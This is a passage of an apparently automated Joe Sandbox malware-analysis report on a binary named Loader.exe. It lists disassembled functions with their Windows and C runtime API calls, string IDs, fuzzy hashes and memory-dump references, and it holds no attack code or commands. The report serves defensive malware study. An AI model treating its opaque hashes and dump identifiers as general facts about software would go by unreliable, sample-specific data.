                                                                                              • API String ID: 4119006552-3791761129
                                                                                              • Opcode ID: dd443d7c25e705428e5d255e786e664d1622c725d4466258bbeb9f7529888d97
                                                                                              • Instruction ID: b3abd649bf5002285ab26d587a3d859a8f3e02726442308ede6c085739c7cf6b
                                                                                              • Opcode Fuzzy Hash: dd443d7c25e705428e5d255e786e664d1622c725d4466258bbeb9f7529888d97
                                                                                              • Instruction Fuzzy Hash: B6B1AF31880209EFCF18DFA4E9819AEB7B9FF04394B146159E8117B253DB31DA52CB91
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E66167
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E6616F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E661F8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E66223
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00E66278
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: ^$csm
                                                                                              • API String ID: 1170836740-3816050194
                                                                                              • Opcode ID: a8a9acbca9d0c4571d12a991fc5ec1be27373134de29f9a09c841ad899ee427b
                                                                                              • Instruction ID: 7da00a6d7e99b88ee18013c836ee5af1d434fdc4cbd07d14304aa887c3fe6d02
                                                                                              • Opcode Fuzzy Hash: a8a9acbca9d0c4571d12a991fc5ec1be27373134de29f9a09c841ad899ee427b
                                                                                              • Instruction Fuzzy Hash: 48410534A50218EFCF10DF68E890A9EBBF5BF45358F149065E8197B393D731AA05CB91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                              • String ID:
                                                                                              • API String ID: 127012223-0
                                                                                              • Opcode ID: 1f7df6f20fbb16e081c641c1b37c3553c9a88a3118eed6fd0a4a47c1bb68f106
                                                                                              • Instruction ID: b44dc9c8227f2586e97e11b0ec45dbdcf58a42fe87bf52685ffd50534eda8708
                                                                                              • Opcode Fuzzy Hash: 1f7df6f20fbb16e081c641c1b37c3553c9a88a3118eed6fd0a4a47c1bb68f106
                                                                                              • Instruction Fuzzy Hash: E771E372940205EBDF319E64DC81BAE7BEA9F49354F28A015E91CF7281E735DD408B60
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E68831,00E65F0D,00E655A4), ref: 00E68848
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E68856
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E6886F
                                                                                              • SetLastError.KERNEL32(00000000,00E68831,00E65F0D,00E655A4), ref: 00E688C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 16488a03dd69c8244b7ca7df1446f010063d3662e369d21a5706ce9f5292cc14
                                                                                              • Instruction ID: 2a451d83daf1ea92f4f26b9822dd74ab75a254383ee6855df9ceadb34dda7cd6
                                                                                              • Opcode Fuzzy Hash: 16488a03dd69c8244b7ca7df1446f010063d3662e369d21a5706ce9f5292cc14
                                                                                              • Instruction Fuzzy Hash: C3014C3228C2125DE7286BB67D86A5A27D4FF127F83E01339F114B61F1EF114C455340
                                                                                              Strings
                                                                                              • C:\Users\user\Desktop\Loader.exe, xrefs: 00E6CB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Users\user\Desktop\Loader.exe
                                                                                              • API String ID: 0-3241315448
                                                                                              • Opcode ID: 4dd79c4ee7aa1c09c12658f751645d0bc9c7b62b2006760f1982400792bf6626
                                                                                              • Instruction ID: 4058ff9612a395a2f14f46bbd0294b10dc0764c1ccdab50530acbe0192bb68a3
                                                                                              • Opcode Fuzzy Hash: 4dd79c4ee7aa1c09c12658f751645d0bc9c7b62b2006760f1982400792bf6626
                                                                                              • Instruction Fuzzy Hash: 5721C271280205AFCB20AF65BC95C7AB7A9AF413E87205925F8ADF7551DB30EC80D790
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4E40E4DF,?,?,00000000,00E725EB,000000FF,?,00E67015,00000002,?,00E670B1,00E683A0), ref: 00E66F89
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E66F9B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00E725EB,000000FF,?,00E67015,00000002,?,00E670B1,00E683A0), ref: 00E66FBD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 7c9f8e19e6661ca2bc2ce16aaf2b2179a6d3aa93e809309b274db3e33691b1c7
                                                                                              • Instruction ID: f27dba54bde04a3916b141e1ab27cb5390018d208237e90d1db9b310e0f49425
                                                                                              • Opcode Fuzzy Hash: 7c9f8e19e6661ca2bc2ce16aaf2b2179a6d3aa93e809309b274db3e33691b1c7
                                                                                              • Instruction Fuzzy Hash: 3201D631A54619AFCB11CF51EC09FAEB7B8FB04B55F044525F825F2390DB749944CA90
                                                                                              APIs
                                                                                              • __alloca_probe_16.LIBCMT ref: 00E6DFA2
                                                                                              • __alloca_probe_16.LIBCMT ref: 00E6E06B
                                                                                              • __freea.LIBCMT ref: 00E6E0D2
                                                                                                • Part of subcall function 00E6BC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E641E0,?,?,00E61007,?,00E5FAB5), ref: 00E6BC77
                                                                                              • __freea.LIBCMT ref: 00E6E0E5
                                                                                              • __freea.LIBCMT ref: 00E6E0F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1423051803-0
                                                                                              • Opcode ID: 51ab6f476d3bde44281c5c846d7ea5bb9f91e443c3654de8cc937d5ec6057a2d
                                                                                              • Instruction ID: 63b041d30eb0d2d7179d078ab64fa2cb3c3d85f7fe6e0c147ae2417b0b727fae
                                                                                              • Opcode Fuzzy Hash: 51ab6f476d3bde44281c5c846d7ea5bb9f91e443c3654de8cc937d5ec6057a2d
                                                                                              • Instruction Fuzzy Hash: 3051E476680206AFDF215F60EC41EBB76ADEF44794F255029FD14F6282EBB1DC50C660
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00E693FE,?,?,00000000,00000000,00000000,?), ref: 00E6951D
                                                                                              • CatchIt.LIBVCRUNTIME ref: 00E69603
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CatchEncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 1435073870-2084237596
                                                                                              • Opcode ID: d9e301e48f2a99782cfa61085283d7758f9a48e1a26b1677ba970400ef43289c
                                                                                              • Instruction ID: a8bc74c1fc24edfba93a0280380b7c337c03fd567a6152ccf727d15b2da1b325
                                                                                              • Opcode Fuzzy Hash: d9e301e48f2a99782cfa61085283d7758f9a48e1a26b1677ba970400ef43289c
                                                                                              • Instruction Fuzzy Hash: CE418A72940209AFCF16CF94ED81AEE7BB9FF48344F189099F905B7222D7359950CB50
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00E6DCFA,00000000,?,00E7CCD0,?,?,?,00E6DC31,00000004,InitializeCriticalSectionEx,00E746F8,00E74700), ref: 00E6DC6B
                                                                                              • GetLastError.KERNEL32(?,00E6DCFA,00000000,?,00E7CCD0,?,?,?,00E6DC31,00000004,InitializeCriticalSectionEx,00E746F8,00E74700,00000000,?,00E6971C), ref: 00E6DC75
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00E6DC9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: eb560adc2025fb78eb900df3916e1dd11b35dff462c1e91cd982281eee02698e
                                                                                              • Instruction ID: 4aa6975075219598b219b26dcf495685328b1f58d9f81f5a145f5026410c0828
                                                                                              • Opcode Fuzzy Hash: eb560adc2025fb78eb900df3916e1dd11b35dff462c1e91cd982281eee02698e
                                                                                              • Instruction Fuzzy Hash: 12E048307C4209BFEF206B62FD4AB587F69AF10B94F545020F90DF80E1FBA29955D544
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(4E40E4DF,00000000,00000000,?), ref: 00E6E64B
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E6E89D
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E6E8E3
                                                                                              • GetLastError.KERNEL32 ref: 00E6E986
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: 92ea2acc75f02eece62c28d11dcc2bcc788be2f2fd698f2000b308a02daadf3a
                                                                                              • Instruction ID: 1c7cbf8ba6e8b0b76ff17156af272e14939378c722a6ade1f7373c9e0e3af098
                                                                                              • Opcode Fuzzy Hash: 92ea2acc75f02eece62c28d11dcc2bcc788be2f2fd698f2000b308a02daadf3a
                                                                                              • Instruction Fuzzy Hash: 90D18979D002489FCB15CFA8E8809EDBBF9EF48354F28456AE456FB391D730A946CB50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: fb1cd738996e852a94cecc5a3a75b99eb7fdec41a14218af93b2626cb9f48568
                                                                                              • Instruction ID: 7b962daae82f24dbeb877bcc17f76949adea877fdfd5607d56a5f246959cb164
                                                                                              • Opcode Fuzzy Hash: fb1cd738996e852a94cecc5a3a75b99eb7fdec41a14218af93b2626cb9f48568
                                                                                              • Instruction Fuzzy Hash: C351F672685606AFDB288F14F941BBA73E9FF50384F14511DE945BB192DB32EC40C790
                                                                                              APIs
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • GetLastError.KERNEL32 ref: 00E6C61C
                                                                                              • __dosmaperr.LIBCMT ref: 00E6C623
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00E6C65D
                                                                                              • __dosmaperr.LIBCMT ref: 00E6C664
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 60c8dcbcf2095013b2bbf95230c370e895f5ffc711e8e443a06e77084f0f7e65
                                                                                              • Instruction ID: 5a8669a689152a7f7e47938d97c3994315055bd2d3a4444a421aa5a55edcb462
                                                                                              • Opcode Fuzzy Hash: 60c8dcbcf2095013b2bbf95230c370e895f5ffc711e8e443a06e77084f0f7e65
                                                                                              • Instruction Fuzzy Hash: 5521B671680205AF9B109F65EC8097E7BE9EF453E8720B519F8AAF7111D730EC818BA4
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00E6D235
                                                                                                • Part of subcall function 00E6D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,00E687B1,?,00000000,?), ref: 00E6D192
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D26D
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D28D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: f60759e5a1cf6ef7a46304d08ffc5966d3c30846188ffec9318c6b687ec3ffc6
                                                                                              • Instruction ID: ddf7f4fd98553e0fbde6e487ada63dec0ba3f75623f48cee6e3d4be4a0e9fc8a
                                                                                              • Opcode Fuzzy Hash: f60759e5a1cf6ef7a46304d08ffc5966d3c30846188ffec9318c6b687ec3ffc6
                                                                                              • Instruction Fuzzy Hash: 3911C4B1F495197E672167767CC9CAF6DACDF953E8B901014F805F2112FB60CD4241B0
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000), ref: 00E707D7
                                                                                              • GetLastError.KERNEL32(?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?,?,?,00E6E320,00000000), ref: 00E707E3
                                                                                                • Part of subcall function 00E70840: CloseHandle.KERNEL32(FFFFFFFE,00E707F3,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?,?), ref: 00E70850
                                                                                              • ___initconout.LIBCMT ref: 00E707F3
                                                                                                • Part of subcall function 00E70815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E707B1,00E6FF1E,?,?,00E6E9DA,?,00000000,00000000,?), ref: 00E70828
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00E6FF31,00000000,00000001,00000000,?,?,00E6E9DA,?,00000000,00000000,?), ref: 00E70808
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 0185329ddabf46b137ee339476bb9cc5c126e154bb4d7fd9b30a56b57c6ca550
                                                                                              • Instruction ID: 001de7e67074ba9b4e630857ef9044f2d5b8b04a1b22bb2549eec8d9e66672bf
                                                                                              • Opcode Fuzzy Hash: 0185329ddabf46b137ee339476bb9cc5c126e154bb4d7fd9b30a56b57c6ca550
                                                                                              • Instruction Fuzzy Hash: C3F0F836000159FFCF225F969C08A8A3E66FF083A1F009425FA2CA5122D67288659B91
                                                                                              APIs
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E68D75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___except_validate_context_record
                                                                                              • String ID: csm$csm
                                                                                              • API String ID: 3493665558-3733052814
                                                                                              • Opcode ID: f69caa62f47b4ba9f9e273ac1a5cab86748e343e8b62afa8859ee651345feba2
                                                                                              • Instruction ID: 1c728529fce3381b0ae4f94497d0c16df279b53e1278a5a2a34c0f4ae8cbb651
                                                                                              • Opcode Fuzzy Hash: f69caa62f47b4ba9f9e273ac1a5cab86748e343e8b62afa8859ee651345feba2
                                                                                              • Instruction Fuzzy Hash: 24313C76480215EFCF264F50EE048AA7B66FF18398B18675AF94439121CB33DDA1DB91
                                                                                              APIs
                                                                                                • Part of subcall function 00E64533: __EH_prolog3_GS.LIBCMT ref: 00E6453A
                                                                                              • std::domain_error::domain_error.LIBCPMT ref: 00E645EC
                                                                                                • Part of subcall function 00E643A4: std::exception::exception.LIBCONCRT ref: 00E643BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
